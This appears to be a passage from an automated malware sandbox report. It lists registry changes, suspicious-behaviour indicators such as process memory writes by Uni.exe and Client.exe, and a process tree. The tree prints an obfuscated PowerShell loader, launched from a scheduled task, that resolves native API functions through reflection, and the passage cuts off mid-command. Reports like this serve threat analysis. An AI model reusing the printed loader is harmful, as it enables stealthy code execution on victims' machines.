Set value (data) \REGISTRY\USER\S-1-5-21-1474490143-3221292397-4168103503-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\15ebb458-1dd8-4c7f = 0114020000000000c0000000000000464c0000000114020000000000c0000000000000468300000020000000db96f9c381a3da0157bb3ec481a3da0157bb3ec481a3da013c9f07000000000001000000000000000000000000000000260514001f50e04fd020ea3a6910a2d808002b30309d19002f433a5c0000000000000000000000000000000000000050003100000000000000000010005573657273003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005500730065007200730000001400500031000000000000000000100041646d696e003c0009000400efbe00000000000000002e0000000000000000000000000000000000000000000000000000000000410064006d0069006e000000140056003100000000000000000010004170704461746100400009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000041007000700044006100740061000000160050003100000000000000000010004c6f63616c003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c00000014005a003100000000000000000010005061636b616765730000420009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005000610063006b00610067006500730000001800e4003100000000000000000010004d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e31683274787965777900009e0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e003100680032007400780079006500770079000000460060003100000000000000000010004c6f63616c53746174650000460009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c005300740061007400650000001a00660031000000000000000000100053746167656441737365747300004a0009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000053007400610067006500640041007300730065007400730000001c00ad01320000000000ab5825482000336638626533383861366535643561636431366261623834643030306236323634326530656435316432633831613863366633643433363865613035323530660000b20009000400efbeab582548ab5825482e0000000000000000000000000000000000000000000000000012d2a800330066003800620065003300380038006100360065003500640035006100630064003100360062006100620038003400640030003000300062003600320036003400320065003000650064003500310064003200630038003100610038006300360066003300640034003300360038006500610030003500320035003000660000005000ab0000002700efbe9d00000031535053b79daeff8d1cff43818c84403aa3732d8100000064000000001f000000370000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e0031006800320074007800790065007700790000000000000000000000000050000000eb0000001c000000010000001c0000003400000000000000ea00000018000000030000001e6bfc981000000057696e646f777300433a5c55736572735c41646d696e5c417070446174615c4c6f63616c5c5061636b616765735c4d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e3168327478796577795c4c6f63616c53746174655c5374616765644173736574735c33663862653338386136653564356163643136626162383464303030623632363432653065643531643263383161386336663364343336386561303532353066000010000000050000a028000000cd0000001c0000000b0000a08f856c5e220e60479afeea3317b67173cd00000060000000030000a0580000000000000075626c6e6a7268660000000000000000e402feced506964aba942aaf5ab964639248d9e434feee118e664e00a0a556b8e402feced506964aba942aaf5ab964639248d9e434feee118e664e00a0a556b8d2000000090000a08d00000031535053e28a5846bc4c3843bbfc139326986dce7100000004000000001f0000002f00000053002d0031002d0035002d00320031002d0031003400370034003400390030003100340033002d0033003200320031003200390032003300390037002d0034003100360038003100300033003500300033002d00310030003000300000000000000000003900000031535053b1166d44ad8d7048a748402ea43d788c1d000000680000000048000000d35e07e9000000000000d01200000000000000000000000000000000 RuntimeBroker.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ RuntimeBroker.exe Set value (str) \REGISTRY\USER\S-1-5-21-1474490143-3221292397-4168103503-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\93a8784b-5fe7-41e7 RuntimeBroker.exe Set value (data) \REGISTRY\USER\S-1-5-21-1474490143-3221292397-4168103503-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\5f0948a8-f179-4846 = dd795fc481a3da01 RuntimeBroker.exe Set value (str) \REGISTRY\USER\S-1-5-21-1474490143-3221292397-4168103503-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\5f0948a8-f179-4846 = "Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy" RuntimeBroker.exe Set value (str) \REGISTRY\USER\S-1-5-21-1474490143-3221292397-4168103503-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\5f0948a8-f179-4846 = "\\\\?\\Volume{E9075ED3-0000-0000-0000-D01200000000}\\Users\\Admin\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\StagedAssets\\edc232bc484ce24bf6217939837fc6cbf03892ad9dff10d3c6fe8cbac931b9a6" RuntimeBroker.exe Key deleted \REGISTRY\USER\S-1-5-21-1474490143-3221292397-4168103503-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\93a8784b-5fe7-41e7 RuntimeBroker.exe Key created \REGISTRY\USER\S-1-5-21-1474490143-3221292397-4168103503-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System RuntimeBroker.exe Set value (data) \REGISTRY\USER\S-1-5-21-1474490143-3221292397-4168103503-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\93a8784b-5fe7-41e7 = 5a07a3c381a3da01 RuntimeBroker.exe Set value (data) \REGISTRY\USER\S-1-5-21-1474490143-3221292397-4168103503-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\15ebb458-1dd8-4c7f = 147d67c481a3da01 RuntimeBroker.exe Key created \REGISTRY\USER\S-1-5-21-1474490143-3221292397-4168103503-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\15ebb458-1dd8-4c7f RuntimeBroker.exe Set value (int) \REGISTRY\USER\S-1-5-21-1474490143-3221292397-4168103503-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\15ebb458-1dd8-4c7f = "8324" RuntimeBroker.exe Key deleted \REGISTRY\USER\S-1-5-21-1474490143-3221292397-4168103503-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\bc72a060-adef-4519 RuntimeBroker.exe Key deleted \REGISTRY\USER\S-1-5-21-1474490143-3221292397-4168103503-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\b6fce597-5e82-45f3 RuntimeBroker.exe Set value (str) \REGISTRY\USER\S-1-5-21-1474490143-3221292397-4168103503-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\93a8784b-5fe7-41e7 = "Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy" RuntimeBroker.exe Set value (data) \REGISTRY\USER\S-1-5-21-1474490143-3221292397-4168103503-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\93a8784b-5fe7-41e7 = 0114020000000000c0000000000000464c0000000114020000000000c0000000000000468300000020000000eefc9ec381a3da01eefc9ec381a3da01eefc9ec381a3da01000000000000000001000000000000000000000000000000260514001f50e04fd020ea3a6910a2d808002b30309d19002f433a5c0000000000000000000000000000000000000050003100000000000000000010005573657273003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005500730065007200730000001400500031000000000000000000100041646d696e003c0009000400efbe00000000000000002e0000000000000000000000000000000000000000000000000000000000410064006d0069006e000000140056003100000000000000000010004170704461746100400009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000041007000700044006100740061000000160050003100000000000000000010004c6f63616c003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c00000014005a003100000000000000000010005061636b616765730000420009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005000610063006b00610067006500730000001800e4003100000000000000000010004d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e31683274787965777900009e0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e003100680032007400780079006500770079000000460060003100000000000000000010004c6f63616c53746174650000460009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c005300740061007400650000001a00660031000000000000000000100053746167656441737365747300004a0009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000053007400610067006500640041007300730065007400730000001c00ad01320000000000ab5825482000336638626533383861366535643561636431366261623834643030306236323634326530656435316432633831613863366633643433363865613035323530660000b20009000400efbeab582548ab5825482e0000000000000000000000000000000000000000000000000012d2a800330066003800620065003300380038006100360065003500640035006100630064003100360062006100620038003400640030003000300062003600320036003400320065003000650064003500310064003200630038003100610038006300360066003300640034003300360038006500610030003500320035003000660000005000ab0000002700efbe9d00000031535053b79daeff8d1cff43818c84403aa3732d8100000064000000001f000000370000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e0031006800320074007800790065007700790000000000000000000000000050000000eb0000001c000000010000001c0000003400000000000000ea00000018000000030000001e6bfc981000000057696e646f777300433a5c55736572735c41646d696e5c417070446174615c4c6f63616c5c5061636b616765735c4d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e3168327478796577795c4c6f63616c53746174655c5374616765644173736574735c33663862653338386136653564356163643136626162383464303030623632363432653065643531643263383161386336663364343336386561303532353066000010000000050000a028000000cd0000001c0000000b0000a08f856c5e220e60479afeea3317b67173cd00000060000000030000a0580000000000000075626c6e6a7268660000000000000000e402feced506964aba942aaf5ab964638e48d9e434feee118e664e00a0a556b8e402feced506964aba942aaf5ab964638e48d9e434feee118e664e00a0a556b8d2000000090000a08d00000031535053e28a5846bc4c3843bbfc139326986dce7100000004000000001f0000002f00000053002d0031002d0035002d00320031002d0031003400370034003400390030003100340033002d0033003200320031003200390032003300390037002d0034003100360038003100300033003500300033002d00310030003000300000000000000000003900000031535053b1166d44ad8d7048a748402ea43d788c1d000000680000000048000000d35e07e9000000000000d01200000000000000000000000000000000 RuntimeBroker.exe Set value (data) \REGISTRY\USER\S-1-5-21-1474490143-3221292397-4168103503-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\bc72a060-adef-4519 = ac31d7c381a3da01 RuntimeBroker.exe Key created \REGISTRY\USER\S-1-5-21-1474490143-3221292397-4168103503-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\5f0948a8-f179-4846 RuntimeBroker.exe -
Runs ping.exe 1 TTPs 1 IoCs
pid Process 2104 PING.EXE -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 2572 powershell.EXE 2572 powershell.EXE 908 powershell.EXE 908 powershell.EXE 2572 powershell.EXE 2600 dllhost.exe 2600 dllhost.exe 2600 dllhost.exe 2600 dllhost.exe 4132 Client.exe 2600 dllhost.exe 2600 dllhost.exe 908 powershell.EXE 2600 dllhost.exe 2600 dllhost.exe 2600 dllhost.exe 2600 dllhost.exe 908 powershell.EXE 4876 dllhost.exe 4876 dllhost.exe 4876 dllhost.exe 4876 dllhost.exe 4132 Client.exe 4876 dllhost.exe 4876 dllhost.exe 4876 dllhost.exe 4876 dllhost.exe 4876 dllhost.exe 4876 dllhost.exe 4876 dllhost.exe 4876 dllhost.exe 4876 dllhost.exe 4876 dllhost.exe 4876 dllhost.exe 4876 dllhost.exe 4876 dllhost.exe 4876 dllhost.exe 4876 dllhost.exe 4876 dllhost.exe 4876 dllhost.exe 4876 dllhost.exe 4876 dllhost.exe 4876 dllhost.exe 4876 dllhost.exe 4876 dllhost.exe 4876 dllhost.exe 4876 dllhost.exe 4876 dllhost.exe 4876 dllhost.exe 4876 dllhost.exe 4876 dllhost.exe 4876 dllhost.exe 4876 dllhost.exe 4876 dllhost.exe 4876 dllhost.exe 4876 dllhost.exe 4876 dllhost.exe 4876 dllhost.exe 4876 dllhost.exe 4876 dllhost.exe 4876 dllhost.exe 4876 dllhost.exe 4876 dllhost.exe 4876 dllhost.exe -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
pid Process 3292 Explorer.EXE -
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 4 IoCs
pid Process 2336 msedge.exe 2336 msedge.exe 2336 msedge.exe 2336 msedge.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 3584 Uni.exe Token: SeDebugPrivilege 2572 powershell.EXE Token: SeDebugPrivilege 4132 Client.exe Token: SeDebugPrivilege 908 powershell.EXE Token: SeDebugPrivilege 2572 powershell.EXE Token: SeDebugPrivilege 2600 dllhost.exe Token: SeDebugPrivilege 908 powershell.EXE Token: SeDebugPrivilege 4876 dllhost.exe Token: SeShutdownPrivilege 3292 Explorer.EXE Token: SeCreatePagefilePrivilege 3292 Explorer.EXE Token: SeShutdownPrivilege 3292 Explorer.EXE Token: SeCreatePagefilePrivilege 3292 Explorer.EXE Token: SeAuditPrivilege 2204 svchost.exe Token: SeShutdownPrivilege 3292 Explorer.EXE Token: SeCreatePagefilePrivilege 3292 Explorer.EXE Token: SeShutdownPrivilege 3292 Explorer.EXE Token: SeCreatePagefilePrivilege 3292 Explorer.EXE Token: SeShutdownPrivilege 3292 Explorer.EXE Token: SeCreatePagefilePrivilege 3292 Explorer.EXE Token: SeAuditPrivilege 2204 svchost.exe Token: SeShutdownPrivilege 3292 Explorer.EXE Token: SeCreatePagefilePrivilege 3292 Explorer.EXE Token: SeShutdownPrivilege 3292 Explorer.EXE Token: SeCreatePagefilePrivilege 3292 Explorer.EXE Token: SeShutdownPrivilege 3292 Explorer.EXE Token: SeCreatePagefilePrivilege 3292 Explorer.EXE Token: SeShutdownPrivilege 3292 Explorer.EXE Token: SeCreatePagefilePrivilege 3292 Explorer.EXE Token: SeShutdownPrivilege 3292 Explorer.EXE Token: SeCreatePagefilePrivilege 3292 Explorer.EXE Token: SeShutdownPrivilege 3292 Explorer.EXE Token: SeCreatePagefilePrivilege 3292 Explorer.EXE Token: SeShutdownPrivilege 3292 Explorer.EXE Token: SeCreatePagefilePrivilege 3292 Explorer.EXE Token: SeShutdownPrivilege 3292 Explorer.EXE Token: SeCreatePagefilePrivilege 3292 Explorer.EXE Token: SeShutdownPrivilege 3292 Explorer.EXE Token: SeCreatePagefilePrivilege 3292 Explorer.EXE Token: SeShutdownPrivilege 3292 Explorer.EXE Token: SeCreatePagefilePrivilege 3292 Explorer.EXE Token: SeShutdownPrivilege 3292 Explorer.EXE Token: SeCreatePagefilePrivilege 3292 Explorer.EXE Token: SeShutdownPrivilege 3292 Explorer.EXE Token: SeCreatePagefilePrivilege 3292 Explorer.EXE Token: SeShutdownPrivilege 3292 Explorer.EXE Token: SeCreatePagefilePrivilege 3292 Explorer.EXE Token: SeShutdownPrivilege 3292 Explorer.EXE Token: SeCreatePagefilePrivilege 3292 Explorer.EXE Token: SeShutdownPrivilege 3292 Explorer.EXE Token: SeCreatePagefilePrivilege 3292 Explorer.EXE Token: SeShutdownPrivilege 3292 Explorer.EXE Token: SeCreatePagefilePrivilege 3292 Explorer.EXE Token: SeShutdownPrivilege 476 dwm.exe Token: SeCreatePagefilePrivilege 476 dwm.exe Token: SeShutdownPrivilege 3292 Explorer.EXE Token: SeCreatePagefilePrivilege 3292 Explorer.EXE Token: SeShutdownPrivilege 3292 Explorer.EXE Token: SeCreatePagefilePrivilege 3292 Explorer.EXE Token: SeShutdownPrivilege 3292 Explorer.EXE Token: SeCreatePagefilePrivilege 3292 Explorer.EXE Token: SeShutdownPrivilege 3292 Explorer.EXE Token: SeCreatePagefilePrivilege 3292 Explorer.EXE Token: SeShutdownPrivilege 3292 Explorer.EXE Token: SeCreatePagefilePrivilege 3292 Explorer.EXE -
Suspicious use of FindShellTrayWindow 26 IoCs
pid Process 2336 msedge.exe 2336 msedge.exe 2336 msedge.exe 2336 msedge.exe 2336 msedge.exe 2336 msedge.exe 2336 msedge.exe 2336 msedge.exe 2336 msedge.exe 2336 msedge.exe 2336 msedge.exe 2336 msedge.exe 2336 msedge.exe 2336 msedge.exe 2336 msedge.exe 2336 msedge.exe 2336 msedge.exe 2336 msedge.exe 2336 msedge.exe 2336 msedge.exe 2336 msedge.exe 2336 msedge.exe 2336 msedge.exe 2336 msedge.exe 2336 msedge.exe 2336 msedge.exe -
Suspicious use of SendNotifyMessage 12 IoCs
pid Process 2336 msedge.exe 2336 msedge.exe 2336 msedge.exe 2336 msedge.exe 2336 msedge.exe 2336 msedge.exe 2336 msedge.exe 2336 msedge.exe 2336 msedge.exe 2336 msedge.exe 2336 msedge.exe 2336 msedge.exe -
Suspicious use of SetWindowsHookEx 2 IoCs
pid Process 4132 Client.exe 2004 ScreenClippingHost.exe -
Suspicious use of UnmapMainImage 2 IoCs
pid Process 3908 RuntimeBroker.exe 3292 Explorer.EXE -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 3584 wrote to memory of 4424 3584 Uni.exe 81 PID 3584 wrote to memory of 4424 3584 Uni.exe 81 PID 3584 wrote to memory of 4424 3584 Uni.exe 81 PID 3584 wrote to memory of 4132 3584 Uni.exe 83 PID 3584 wrote to memory of 4132 3584 Uni.exe 83 PID 3584 wrote to memory of 4132 3584 Uni.exe 83 PID 3584 wrote to memory of 4416 3584 Uni.exe 84 PID 3584 wrote to memory of 4416 3584 Uni.exe 84 PID 3584 wrote to memory of 4416 3584 Uni.exe 84 PID 3584 wrote to memory of 2036 3584 Uni.exe 85 PID 3584 wrote to memory of 2036 3584 Uni.exe 85 PID 3584 wrote to memory of 2036 3584 Uni.exe 85 PID 4132 wrote to memory of 2132 4132 Client.exe 89 PID 4132 wrote to memory of 2132 4132 Client.exe 89 PID 4132 wrote to memory of 2132 4132 Client.exe 89 PID 4132 wrote to memory of 2812 4132 Client.exe 91 PID 4132 wrote to memory of 2812 4132 Client.exe 91 PID 4132 wrote to memory of 2812 4132 Client.exe 91 PID 2572 wrote to memory of 2600 2572 powershell.EXE 94 PID 2572 wrote to memory of 2600 2572 powershell.EXE 94 PID 2572 wrote to memory of 2600 2572 powershell.EXE 94 PID 2572 wrote to memory of 2600 2572 powershell.EXE 94 PID 2572 wrote to memory of 2600 2572 powershell.EXE 94 PID 2572 wrote to memory of 2600 2572 powershell.EXE 94 PID 2572 wrote to memory of 2600 2572 powershell.EXE 94 PID 2572 wrote to memory of 2600 2572 powershell.EXE 94 PID 2600 wrote to memory of 632 2600 dllhost.exe 5 PID 2600 wrote to memory of 692 2600 dllhost.exe 7 PID 2600 wrote to memory of 1000 2600 dllhost.exe 12 PID 2600 wrote to memory of 476 2600 dllhost.exe 13 PID 2600 wrote to memory of 536 2600 dllhost.exe 14 PID 2600 wrote to memory of 452 2600 dllhost.exe 15 PID 2600 wrote to memory of 1048 2600 dllhost.exe 16 PID 2600 wrote to memory of 1092 2600 dllhost.exe 17 PID 2600 wrote to memory of 1104 2600 dllhost.exe 18 PID 2600 wrote to memory of 1172 2600 dllhost.exe 20 PID 2600 wrote to memory of 1228 2600 dllhost.exe 21 PID 2600 wrote to memory of 1252 2600 dllhost.exe 22 PID 2600 wrote to memory of 1368 2600 dllhost.exe 23 PID 2600 wrote to memory of 1384 2600 dllhost.exe 24 PID 2600 wrote to memory of 1416 2600 dllhost.exe 25 PID 2600 wrote to memory of 1504 2600 dllhost.exe 26 PID 2600 wrote to memory of 1520 2600 dllhost.exe 27 PID 2600 wrote to memory of 1660 2600 dllhost.exe 28 PID 2600 wrote to memory of 1704 2600 dllhost.exe 29 PID 2600 wrote to memory of 1716 2600 dllhost.exe 30 PID 2600 wrote to memory of 1812 2600 dllhost.exe 31 PID 2600 wrote to memory of 1824 2600 dllhost.exe 32 PID 2600 wrote to memory of 1892 2600 dllhost.exe 33 PID 2600 wrote to memory of 1904 2600 dllhost.exe 34 PID 2600 wrote to memory of 1988 2600 dllhost.exe 35 PID 2600 wrote to memory of 2028 2600 dllhost.exe 36 PID 2600 wrote to memory of 1864 2600 dllhost.exe 37 PID 2600 wrote to memory of 2204 2600 dllhost.exe 39 PID 2600 wrote to memory of 2380 2600 dllhost.exe 40 PID 2600 wrote to memory of 2388 2600 dllhost.exe 41 PID 2600 wrote to memory of 2416 2600 dllhost.exe 42 PID 2600 wrote to memory of 2508 2600 dllhost.exe 43 PID 2600 wrote to memory of 2516 2600 dllhost.exe 44 PID 2600 wrote to memory of 2532 2600 dllhost.exe 45 PID 2600 wrote to memory of 2556 2600 dllhost.exe 46 PID 2600 wrote to memory of 2576 2600 dllhost.exe 47 PID 2600 wrote to memory of 2592 2600 dllhost.exe 48 PID 2600 wrote to memory of 3060 2600 dllhost.exe 50 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Windows\system32\winlogon.exewinlogon.exe1⤵PID:632
-
C:\Windows\system32\dwm.exe"dwm.exe"2⤵
- Suspicious use of AdjustPrivilegeToken
PID:476
-
-
C:\Windows\System32\dllhost.exeC:\Windows\System32\dllhost.exe /Processid:{bca2a637-b1c8-4b93-a233-b7b38892bfff}2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2600
-
-
C:\Windows\System32\dllhost.exeC:\Windows\System32\dllhost.exe /Processid:{a47b2deb-b8d4-43a8-88d6-950657a72d90}2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4876
-
-
C:\Windows\System32\dllhost.exeC:\Windows\System32\dllhost.exe /Processid:{d66f85d8-4632-48b1-9159-f62f62ce7529}2⤵PID:4800
-
-
C:\Windows\system32\lsass.exeC:\Windows\system32\lsass.exe1⤵PID:692
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM1⤵PID:1000
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc1⤵PID:536
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts1⤵PID:452
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService1⤵PID:1048
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule1⤵
- Drops file in System32 directory
PID:1092 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:XwSckbyoJfWJ{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$pFKKtfuoaoKLVX,[Parameter(Position=1)][Type]$PlAXLzpOgy)$VZdZBoOQteo=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+'e'+[Char](102)+''+[Char](108)+'e'+'c'+''+[Char](116)+''+[Char](101)+''+[Char](100)+''+[Char](68)+''+'e'+''+[Char](108)+''+'e'+''+[Char](103)+''+[Char](97)+''+[Char](116)+''+'e'+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('I'+'n'+''+'M'+'e'+[Char](109)+''+'o'+''+[Char](114)+''+[Char](121)+''+[Char](77)+''+[Char](111)+''+[Char](100)+''+[Char](117)+''+[Char](108)+''+'e'+'',$False).DefineType(''+[Char](77)+''+[Char](121)+''+[Char](68)+''+[Char](101)+''+'l'+''+'e'+''+[Char](103)+'at'+[Char](101)+''+'T'+'y'+'p'+'e',''+[Char](67)+''+'l'+'a'+[Char](115)+''+[Char](115)+''+[Char](44)+''+[Char](80)+''+[Char](117)+''+[Char](98)+''+'l'+''+[Char](105)+'c'+[Char](44)+''+'S'+''+[Char](101)+'a'+[Char](108)+''+[Char](101)+'d'+[Char](44)+''+'A'+''+[Char](110)+'si'+[Char](67)+''+[Char](108)+''+[Char](97)+''+'s'+'s'+[Char](44)+''+[Char](65)+'u'+[Char](116)+'o'+'C'+''+'l'+''+[Char](97)+''+[Char](115)+''+[Char](115)+'',[MulticastDelegate]);$VZdZBoOQteo.DefineConstructor('R'+[Char](84)+''+[Char](83)+''+'p'+''+[Char](101)+''+[Char](99)+''+[Char](105)+'a'+[Char](108)+''+'N'+''+[Char](97)+'m'+[Char](101)+''+','+''+[Char](72)+''+'i'+''+[Char](100)+''+[Char](101)+'BySi'+[Char](103)+''+[Char](44)+'P'+[Char](117)+''+[Char](98)+''+[Char](108)+''+[Char](105)+''+[Char](99)+'',[Reflection.CallingConventions]::Standard,$pFKKtfuoaoKLVX).SetImplementationFlags('R'+[Char](117)+'ntime'+[Char](44)+''+[Char](77)+''+'a'+''+'n'+''+[Char](97)+''+[Char](103)+''+[Char](101)+''+'d'+'');$VZdZBoOQteo.DefineMethod('I'+[Char](110)+'vo'+'k'+''+[Char](101)+'',''+[Char](80)+'ub'+[Char](108)+'i'+[Char](99)+''+[Char](44)+''+[Char](72)+''+'i'+'d'+[Char](101)+''+'B'+''+'y'+''+'S'+''+[Char](105)+''+'g'+','+[Char](78)+'e'+'w'+'S'+[Char](108)+'o'+'t'+''+[Char](44)+'V'+[Char](105)+'r'+[Char](116)+'u'+[Char](97)+'l',$PlAXLzpOgy,$pFKKtfuoaoKLVX).SetImplementationFlags(''+'R'+''+'u'+''+[Char](110)+''+'t'+''+[Char](105)+''+[Char](109)+'e'+[Char](44)+''+[Char](77)+'a'+[Char](110)+''+[Char](97)+''+[Char](103)+''+'e'+''+[Char](100)+'');Write-Output $VZdZBoOQteo.CreateType();}$NjzmZAAkwDXxq=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals('S'+'y'+''+[Char](115)+'t'+'e'+''+[Char](109)+''+[Char](46)+''+[Char](100)+''+[Char](108)+'l')}).GetType(''+[Char](77)+''+[Char](105)+''+'c'+''+'r'+''+[Char](111)+''+[Char](115)+''+[Char](111)+''+[Char](102)+'t'+[Char](46)+''+[Char](87)+''+[Char](105)+''+[Char](110)+'3'+[Char](50)+'.'+'U'+''+[Char](110)+''+[Char](115)+'a'+'f'+''+[Char](101)+'N'+[Char](97)+'t'+[Char](105)+'v'+'e'+''+[Char](77)+''+[Char](101)+''+[Char](116)+''+'h'+'o'+[Char](100)+'s');$wXWVCLOwGUhVcH=$NjzmZAAkwDXxq.GetMethod('Get'+'P'+''+[Char](114)+''+[Char](111)+''+[Char](99)+''+[Char](65)+''+[Char](100)+''+[Char](100)+''+[Char](114)+''+[Char](101)+''+[Char](115)+''+[Char](115)+'',[Reflection.BindingFlags](''+[Char](80)+''+'u'+''+[Char](98)+''+'l'+'i'+[Char](99)+''+[Char](44)+''+'S'+''+[Char](116)+''+[Char](97)+'t'+[Char](105)+''+[Char](99)+''),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$gpKgblwCJZHQRJorNAm=XwSckbyoJfWJ @([String])([IntPtr]);$FVenBIChVWekdhLrpiJiFC=XwSckbyoJfWJ 